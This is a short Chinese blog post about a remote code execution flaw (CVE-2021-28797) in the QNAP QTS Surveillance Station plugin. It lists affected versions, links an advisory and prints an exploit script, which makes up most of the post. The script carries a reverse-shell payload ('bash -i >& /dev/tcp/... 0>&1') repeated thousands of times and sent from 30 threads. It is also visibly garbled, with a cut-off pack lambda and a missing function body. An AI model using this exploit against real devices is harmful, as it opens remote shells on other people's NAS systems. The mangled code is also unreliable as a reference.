QNAP QTS Surveillance Station插件远程代码执行漏洞（CVE-2021-28797）

棉花糖

7月20日发布

000

# QNAP QTS Surveillance Station插件远程代码执行漏洞（CVE-2021-28797）

威联通监控管理系统Surveillance Station插件远程代码执行漏洞（CVE-2021-28797）

影响版本：

* QNAP QTS 5.1.5.4.2
* QNAP QTS 5.1.5.3.2

漏洞分析见：https://ssd-disclosure.com/ssd-advisory-qnap-pre-auth-cgi_find_parameter-rce/

Exploit.py：

“`py
import requests
import threading
from struct import *
p = lambda x: pack(“& /dev/tcp/192.168.1.3/4321 0>&1;” * 0x5000 + “\x00” + “bash -i >& /dev/tcp/192.168.1.3/4321 0>&1;” * 0x5000,
}
for i in range(30):
t = threading.Thread(target=run, args=(s, data))
t.start()

if __name__ == ‘__main__’:
main()
“`

文章版权归作者所有，未经允许请勿转载。

THE END